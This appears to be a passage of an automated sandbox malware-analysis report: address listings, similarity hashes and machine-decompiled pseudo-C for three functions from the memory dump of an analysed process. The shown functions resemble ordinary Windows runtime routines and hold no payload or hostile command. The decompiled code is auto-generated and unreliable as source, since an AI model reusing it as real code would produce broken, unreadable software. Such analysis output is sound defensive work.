                                                    0x00af7a98
                                                    0x00af7a9b
                                                    0x00af7a9b
                                                    0x00af7a9e
                                                    0x00af7aa1
                                                    0x00af7bbe
                                                    0x00af7bbe
                                                    0x00af7bc0
                                                    0x00af7be0
                                                    0x00af7be0
                                                    0x00af7a01
                                                    0x00af7a01
                                                    0x00af7a05
                                                    0x00af7a07
                                                    0x00af7a15
                                                    0x00af7a15
                                                    0x00af7a1a
                                                    0x00000000
                                                    0x00af7a1a
                                                    0x00af7bc2
                                                    0x00af7bc6
                                                    0x00af7bc9
                                                    0x00af7bcd
                                                    0x00af7bcf
                                                    0x00af79e6
                                                    0x00af79e6
                                                    0x00af79eb
                                                    0x00af79eb
                                                    0x00af79ef
                                                    0x00af79f1
                                                    0x00000000
                                                    0x00000000
                                                    0x00af79f3
                                                    0x00af79f5
                                                    0x00af79ff
                                                    0x00af79ff
                                                    0x00000000
                                                    0x00af79ff
                                                    0x00af79f7
                                                    0x00af79fd
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00af79fd
                                                    0x00af7bd5
                                                    0x00af7bd8
                                                    0x00000000
                                                    0x00000000
                                                    0x00af7ba9
                                                    0x00af7bac
                                                    0x00af7bb0
                                                    0x00af7bb1
                                                    0x00af7bb1
                                                    0x00af7bb6
                                                    0x00000000
                                                    0x00af7bb6
                                                    0x00af7aa7
                                                    0x00af7aaa
                                                    0x00000000
                                                    0x00000000
                                                    0x00af7ab2
                                                    0x00af7ab3
                                                    0x00af7ab5
                                                    0x00af7aec
                                                    0x00af7aef
                                                    0x00af7b25
                                                    0x00af7b28
                                                    0x00af7b62
                                                    0x00af7b64
                                                    0x00af7b8f
                                                    0x00af7b92
                                                    0x00af7b96
                                                    0x00af7b98
                                                    0x00000000
                                                    0x00000000
                                                    0x00af7b9e
                                                    0x00af7b9f
                                                    0x00af7ba3
                                                    0x00000000
                                                    0x00af7ba3
                                                    0x00af7b66
                                                    0x00af7b68
                                                    0x00af7ae2
                                                    0x00af7ae2
                                                    0x00000000
                                                    0x00af7ae2
                                                    0x00af7b6e
                                                    0x00af7b72
                                                    0x00af7b75
                                                    0x00af7b81
                                                    0x00af7b85
                                                    0x00af7b87
                                                    0x00000000
                                                    0x00000000
                                                    0x00af7b31
                                                    0x00af7b34
                                                    0x00af7b3c
                                                    0x00af7b45
                                                    0x00af7b46
                                                    0x00af7b4f
                                                    0x00af7b51
                                                    0x00af7b57
                                                    0x00af7b59
                                                    0x00af7b59
                                                    0x00000000
                                                    0x00af7b59
                                                    0x00af7b77
                                                    0x00000000
                                                    0x00af7b77
                                                    0x00af7b2a
                                                    0x00000000
                                                    0x00af7b2a
                                                    0x00af7af1
                                                    0x00af7af3
                                                    0x00000000
                                                    0x00000000
                                                    0x00af7afb
                                                    0x00af7afc
                                                    0x00af7afe
                                                    0x00000000
                                                    0x00000000
                                                    0x00af7b00
                                                    0x00af7b03
                                                    0x00000000
                                                    0x00000000
                                                    0x00af7b05
                                                    0x00af7b09
                                                    0x00af7b0d
                                                    0x00af7b0f
                                                    0x00000000
                                                    0x00000000
                                                    0x00af7b18
                                                    0x00af7b1d
                                                    0x00000000
                                                    0x00af7b1d
                                                    0x00af7ab7
                                                    0x00af7ab9
                                                    0x00000000
                                                    0x00000000
                                                    0x00af7abf
                                                    0x00af7ac1
                                                    0x00000000
                                                    0x00000000
                                                    0x00af7ac3
                                                    0x00af7ac6
                                                    0x00000000
                                                    0x00000000
                                                    0x00af7ac8
                                                    0x00af7acc
                                                    0x00af7ad0
                                                    0x00af7ad2
                                                    0x00000000
                                                    0x00000000
                                                    0x00af7adb
                                                    0x00000000
                                                    0x00af7adb
                                                    0x00af79d6
                                                    0x00af79d9
                                                    0x00af79dc
                                                    0x00af7a91
                                                    0x00af7a94
                                                    0x00000000
                                                    0x00af7a94
                                                    0x00af79e2
                                                    0x00000000
                                                    0x00af79e2
                                                    0x00af7a74
                                                    0x00af7a7a
                                                    0x00000000
                                                    0x00000000
                                                    0x00af7a8a
                                                    0x00af7a21
                                                    0x00af7a21
                                                    0x00000000
                                                    0x00af7a21
                                                    0x00a8c650
                                                    0x00a8c651
                                                    0x00a8c656
                                                    0x00a8c65c
                                                    0x00a8c65d
                                                    0x00a8c663
                                                    0x00a8c664
                                                    0x00a8c66a
                                                    0x00a8c66e
                                                    0x00af79c5
                                                    0x00af79c7
                                                    0x00000000
                                                    0x00af79c7
                                                    0x00a8c67a
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a7b6ed9f337f87214fdc82f69239f3279260b7dadd8d54411f671fd58ca15f53
                                                    • Instruction ID: 5940d5cb1b861b701673e33be0de1430322409d368a9c42c09bfc009db0b0c86
                                                    • Opcode Fuzzy Hash: a7b6ed9f337f87214fdc82f69239f3279260b7dadd8d54411f671fd58ca15f53
                                                    • Instruction Fuzzy Hash: 87819E756082098FCB26DF94C881E7FB3A5EB84390F25486AFE469B241D730DD41CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B1B8D0 Relevance: .2, Instructions: 199COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 39%
                                                    			E00B1B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0xb77b9c; // 0x0
				_t124 = L00AA4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E00AC9800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E00AC95B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E00AC95D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L00AA77F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E00AC9910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E00AC95D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0xb77b9c; // 0x0
									_t92 = L00AA4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E00AC9910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E00A8A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E00B1E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E00B1E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E00AC95B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                                                    0x00b1b8d9
                                                    0x00b1b8e4
                                                    0x00000000
                                                    0x00b1b8e6
                                                    0x00b1b8f3
                                                    0x00b1b8f5
                                                    0x00b1b8f5
                                                    0x00b1b8f8
                                                    0x00b1b920
                                                    0x00b1b924
                                                    0x00b1b936
                                                    0x00b1b939
                                                    0x00b1b93d
                                                    0x00b1b948
                                                    0x00b1b9a0
                                                    0x00b1b9a0
                                                    0x00b1b9a4
                                                    0x00b1b9bf
                                                    0x00b1b9c4
                                                    0x00b1b9c6
                                                    0x00b1b9cd
                                                    0x00b1b9d1
                                                    0x00b1bad4
                                                    0x00b1bad8
                                                    0x00b1bada
                                                    0x00b1badc
                                                    0x00b1badc
                                                    0x00b1badf
                                                    0x00b1bae0
                                                    0x00b1bae2
                                                    0x00b1bae4
                                                    0x00b1baec
                                                    0x00b1baee
                                                    0x00b1baf0
                                                    0x00b1baf0
                                                    0x00b1baec
                                                    0x00b1bafb
                                                    0x00b1bafc
                                                    0x00b1bafe
                                                    0x00b1bb01
                                                    0x00b1bb01
                                                    0x00000000
                                                    0x00b1bb06
                                                    0x00b1b9d7
                                                    0x00b1b9db
                                                    0x00b1b9db
                                                    0x00b1b9de
                                                    0x00b1b9de
                                                    0x00b1b9e4
                                                    0x00b1b9e7
                                                    0x00b1b9ea
                                                    0x00b1b9ec
                                                    0x00b1b9ef
                                                    0x00b1b9f3
                                                    0x00b1ba1b
                                                    0x00b1ba1b
                                                    0x00b1ba23
                                                    0x00b1ba24
                                                    0x00b1ba27
                                                    0x00b1ba2a
                                                    0x00b1ba2b
                                                    0x00b1ba2e
                                                    0x00b1ba30
                                                    0x00b1ba37
                                                    0x00b1ba3f
                                                    0x00b1ba9c
                                                    0x00b1baa2
                                                    0x00b1bb13
                                                    0x00b1bb15
                                                    0x00b1baae
                                                    0x00b1baae
                                                    0x00b1bab3
                                                    0x00b1bab5
                                                    0x00b1baba
                                                    0x00b1bac8
                                                    0x00b1bac8
                                                    0x00b1baba
                                                    0x00b1bacd
                                                    0x00b1bacf
                                                    0x00000000
                                                    0x00b1bacf
                                                    0x00b1bb1a
                                                    0x00000000
                                                    0x00b1bb1c
                                                    0x00b1baa7
                                                    0x00b1bb11
                                                    0x00000000
                                                    0x00b1bb11
                                                    0x00b1baa9
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00b1ba41
                                                    0x00b1ba41
                                                    0x00b1ba41
                                                    0x00b1ba58
                                                    0x00b1ba5d
                                                    0x00b1ba62
                                                    0x00000000
                                                    0x00000000
                                                    0x00b1ba64
                                                    0x00b1ba67
                                                    0x00b1ba68
                                                    0x00b1ba69
                                                    0x00b1ba6c
                                                    0x00b1ba6f
                                                    0x00b1ba71
                                                    0x00b1ba78
                                                    0x00b1ba80
                                                    0x00000000
                                                    0x00000000
                                                    0x00b1ba90
                                                    0x00b1ba90
                                                    0x00b1ba97
                                                    0x00000000
                                                    0x00b1ba97
                                                    0x00b1b9f5
                                                    0x00b1b9f7
                                                    0x00b1b9f7
                                                    0x00b1b9fa
                                                    0x00b1ba03
                                                    0x00b1ba07
                                                    0x00b1ba0c
                                                    0x00b1ba10
                                                    0x00b1ba17
                                                    0x00000000
                                                    0x00b1b9f7
                                                    0x00b1b9a6
                                                    0x00b1b9a8
                                                    0x00b1b9af
                                                    0x00b1b9b3
                                                    0x00000000
                                                    0x00000000
                                                    0x00b1b9b9
                                                    0x00000000
                                                    0x00b1b9b9
                                                    0x00b1b94d
                                                    0x00b1b98f
                                                    0x00b1b995
                                                    0x00b1b999
                                                    0x00b1b960
                                                    0x00b1b967
                                                    0x00b1b968
                                                    0x00b1b96a
                                                    0x00000000
                                                    0x00b1b96a
                                                    0x00b1b99b
                                                    0x00b1b99e
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00b1b99e
                                                    0x00b1b951
                                                    0x00b1b954
                                                    0x00b1b95a
                                                    0x00b1b95e
                                                    0x00b1b972
                                                    0x00b1b979
                                                    0x00b1b97d
                                                    0x00b1b97f
                                                    0x00b1b980
                                                    0x00b1b982
                                                    0x00b1b984
                                                    0x00000000
                                                    0x00b1b984
                                                    0x00000000
                                                    0x00b1b926
                                                    0x00000000
                                                    0x00b1b926

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 68f4882f0742b7aaaace644535563b1569d2128fed8a3e82ffad24b1d9357c21
                                                    • Instruction ID: c5a2ab464fb736267d45c258043bc7ff64122ca05286f8bc40333388dd3937b7
                                                    • Opcode Fuzzy Hash: 68f4882f0742b7aaaace644535563b1569d2128fed8a3e82ffad24b1d9357c21
                                                    • Instruction Fuzzy Hash: 4C710D32200701EFDB228F24C985FAAB7E5EF44720F6545ACE6558B6A1DB71E981CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B06DC9 Relevance: .2, Instructions: 199COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 79%
                                                    			E00B06DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L00AA4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E00B06B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E00AA7D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E00AC9AE0();
					_t87 = L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E00B0795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E00B0795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E00B0795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E00B0795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L00AA4620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E00B06B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E00B06B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E00B06B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E00B06B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E00AA7D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E00AC9AE0();
								L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L00AA2400( &_v36);
							if(_v24 >= 0) {
								_t87 = L00AA2400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L00AA2400( &_v52);
							}
							if(_v28 >= 0) {
								return L00AA2400( &_v60);
							}
						}
					}
				}
				return _t87;
			}































                                                    0x00b06dd4
                                                    0x00b06dde
                                                    0x00b06de1
                                                    0x00b06de3
                                                    0x00b06de6
                                                    0x00b06de9
                                                    0x00b06dec
                                                    0x00b06def
                                                    0x00b06df2
                                                    0x00b06df5
                                                    0x00b06dfe
                                                    0x00b06e04
                                                    0x00b06e09
                                                    0x00b06e0d
                                                    0x00b06e18
                                                    0x00b06e1b
                                                    0x00b06e22
                                                    0x00b06e2d
                                                    0x00b06e30
                                                    0x00b06e36
                                                    0x00b06e42
                                                    0x00b06e4d
                                                    0x00b06e50
                                                    0x00b06e55
                                                    0x00b06e5c
                                                    0x00b06e6e
                                                    0x00b06e5e
                                                    0x00b06e67
                                                    0x00b06e67
                                                    0x00b06e73
                                                    0x00b06e74
                                                    0x00b06e77
                                                    0x00b06e7c
                                                    0x00b06e7d
                                                    0x00b06e8e
                                                    0x00b06e93
                                                    0x00b06e9c
                                                    0x00b06ea8
                                                    0x00b06eab
                                                    0x00b06eac
                                                    0x00b06eb3
                                                    0x00b06ecd
                                                    0x00b06edc
                                                    0x00b06ee2
                                                    0x00b06ee5
                                                    0x00b06ef2
                                                    0x00b06efb
                                                    0x00b06f01
                                                    0x00b06f06
                                                    0x00b06f0b
                                                    0x00b06f11
                                                    0x00b06f1a
                                                    0x00b06f22
                                                    0x00b06f26
                                                    0x00b06f26
                                                    0x00b06f33
                                                    0x00b06f41
                                                    0x00b06f44
                                                    0x00b06f47
                                                    0x00b06f54
                                                    0x00b06f65
                                                    0x00b06f77
                                                    0x00b06f7c
                                                    0x00b06f82
                                                    0x00b06f91
                                                    0x00b06f99
                                                    0x00b06fa3
                                                    0x00b06fae
                                                    0x00b06fae
                                                    0x00b06fba
                                                    0x00b06fbb
                                                    0x00b06fbc
                                                    0x00b06fc1
                                                    0x00b06fc2
                                                    0x00b06fd3
                                                    0x00b06fd8
                                                    0x00b06fd8
                                                    0x00b06fdf
                                                    0x00b06fe8
                                                    0x00b06fee
                                                    0x00b06fee
                                                    0x00b06ff5
                                                    0x00b06ffb
                                                    0x00b06ffb
                                                    0x00b07004
                                                    0x00000000
                                                    0x00b0700a
                                                    0x00b07004
                                                    0x00b06eb3
                                                    0x00b06e9c
                                                    0x00b07015

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                    • Instruction ID: 89f90da9e8e7c1743def9c6605e351d775d6c5b6ef402b8ce58396a5e60b399f
                                                    • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                    • Instruction Fuzzy Hash: 39714B71E00219AFCB10DFA9C985AEEBBF9FF48710F104169E505E7291DB34AA51CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00A852A5 Relevance: .2, Instructions: 161COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 78%
                                                    			E00A852A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E00A9EEF0(0xb779a0);
					_t104 =  *0xb78210; // 0x632c80
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E00A9EB70(_t93, 0xb779a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E00AC9890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E00A9EEF0(0xb779a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E00A9EB70(0, 0xb779a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x632c8d
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E00ABF0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E00A9EEF0(0xb779a0);
									__eflags =  *0xb78210 - _t104; // 0x632c80
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0xb78210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E00B04888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E00A9EB70(_t95, 0xb779a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E00AC95D0();
											L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E00AC95D0();
											L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E00A9EB70(_t93, 0xb779a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E00AC95D0();
										L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E00AC95D0();
										L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E00ABF0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                                                    0x00a852a5
                                                    0x00a852ad
                                                    0x00a852b0
                                                    0x00a852b3
                                                    0x00a852b7
                                                    0x00a852ba
                                                    0x00a852bf
                                                    0x00a852c4
                                                    0x00a852cc
                                                    0x00000000
                                                    0x00000000
                                                    0x00a852ce
                                                    0x00a852d9
                                                    0x00a852dd
                                                    0x00a852e7
                                                    0x00a852f7
                                                    0x00a852f9
                                                    0x00a852fd
                                                    0x00ae0dcf
                                                    0x00ae0dd5
                                                    0x00ae0dd6
                                                    0x00ae0dd7
                                                    0x00ae0dd8
                                                    0x00ae0dd9
                                                    0x00ae0dde
                                                    0x00ae0ddf
                                                    0x00ae0de0
                                                    0x00ae0de1
                                                    0x00ae0de2
                                                    0x00ae0de5
                                                    0x00ae0dea
                                                    0x00ae0dec
                                                    0x00ae0f60
                                                    0x00ae0f64
                                                    0x00ae0f70
                                                    0x00ae0f76
                                                    0x00ae0f79
                                                    0x00ae0f79
                                                    0x00000000
                                                    0x00ae0f64
                                                    0x00ae0df2
                                                    0x00ae0df7
                                                    0x00ae0e04
                                                    0x00ae0e0d
                                                    0x00ae0e0d
                                                    0x00ae0e10
                                                    0x00ae0e1a
                                                    0x00ae0e1c
                                                    0x00ae0e4c
                                                    0x00ae0e52
                                                    0x00ae0e61
                                                    0x00ae0e67
                                                    0x00ae0e6b
                                                    0x00ae0e70
                                                    0x00ae0e76
                                                    0x00ae0ed7
                                                    0x00ae0edc
                                                    0x00ae0ee0
                                                    0x00ae0ee6
                                                    0x00ae0eea
                                                    0x00ae0eed
                                                    0x00ae0ef0
                                                    0x00ae0ef3
                                                    0x00ae0ef6
                                                    0x00ae0ef9
                                                    0x00ae0efe
                                                    0x00ae0f01
                                                    0x00ae0f01
                                                    0x00ae0f0b
                                                    0x00ae0f12
                                                    0x00ae0f16
                                                    0x00ae0f18
                                                    0x00ae0f1b
                                                    0x00ae0f2c
                                                    0x00ae0f31
